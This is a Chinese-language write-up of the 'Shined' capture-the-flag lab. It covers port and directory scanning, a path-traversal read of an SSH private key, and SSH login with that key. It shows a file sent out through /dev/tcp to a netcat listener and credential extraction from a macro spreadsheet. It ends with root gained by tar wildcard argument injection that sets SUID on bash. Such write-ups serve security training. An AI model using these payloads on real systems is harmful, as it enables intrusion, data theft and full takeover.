Shined靶场

admin 2025年2月11日15:04:27评论1 views字数 1482阅读4分56秒阅读模式
Shined靶场
Shined靶场
Shined靶场
鼎新安全
don't give up and don't give in !

信息搜集

扫描网段

arp-scan -l

扫描端口

nmap 192.168.109.133 -p- -sS -sC -n --min-rate 5000 -sV
Shined靶场

扫描目录

gobuster dir -u http://192.168.109.133 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt,sh,html

渗透阶段

id_rsa 利用

id_rsa 文件是 PEM 格式的私钥  

条件:

服务器开放2222端口,才有可能利用

读取id_rsa

?inet=../../../../../../../home/cifra/.ssh/id_rsa

Shined靶场

如果攻击者获取了 id_rsa 文件:

  1. 直接访问权限攻击者可以使用私钥登录对应的远程服务器,无需输入密码(前提是服务器上配置了匹配的公钥 id_rsa.pub)。

  2. 权限滥用

    • 如果服务器的 ~/.ssh/authorized_keys 文件包含了与该私钥匹配的公钥,攻击者将获得完全的访问权限。

    • 可能被用于进一步的横向渗透攻击。

vi id_rsa //把私钥粘贴过去注意粘贴时候第一行的空格,去掉!!!!chmod 600 id_rsassh [email protected] -i id_rsa -p 2222
Shined靶场

查看有个文件contabilidad.xlsm

服务器传本地

服务端:

cat contabilidad.xlsm > /dev/tcp/192.168.109.128/6666

本地:

开启监听(优先开)

nc -vlp 6666 > 自定义文件名

上传到本地后

安装oletools才可以使用ol

pip install -U oletools
olevba contabilidad.xlsm //分析

Shined靶场

用户名和密码拿到

登录

ifconfigssh [email protected]

然后拿到第一个user用户标志

Shined靶场

73f5b965bd7e817a71b853f44ada19b0

本地传服务器

本地:

把文件传到本地上去,再从服务器去拉

service apache2 start //开启Apache服务

一定要到tmp目录下,因为权限高

dpkg -L 命令安装包位置cp /var/www/html //上传到网站上面

下载

服务器:

cd /tmpwget http://ip/文件名

传了一个pspy,查看服务器的进程文件

chmod 777 pspy32./papy32

看到这个基本上就知道利用点是什么了tgz

Shined靶场

cd 到tmp目录下一个backup.sh*文件,查看一下

cd /tmpllcat /tmp/backuo.sh

Shined靶场

先到这个目录

cd /home/leopoldo/Desktop/scripts/

提权

echo'chmod +s /bin/bash' > a.shtouch -- '--checkpoint-action=exec=sh a.sh'touch -- '--checkpoint=1'

Shined靶场

ls -la /bin/bashbash -p

等个几秒,就执行成功了

Shined靶场

后面到root目录拿flag

Shined靶场

01d940a42e6a3f5727e2382d9f4f3b87

总结

今天打这个靶场确实挺麻烦的,有很多新知识点,不过还好。

Shined靶场
END
Shined靶场

注:鼎星安全有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

原文始发于微信公众号(鼎新安全):Shined靶场

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月11日15:04:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Shined靶场https://cn-sec.com/archives/3643644.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息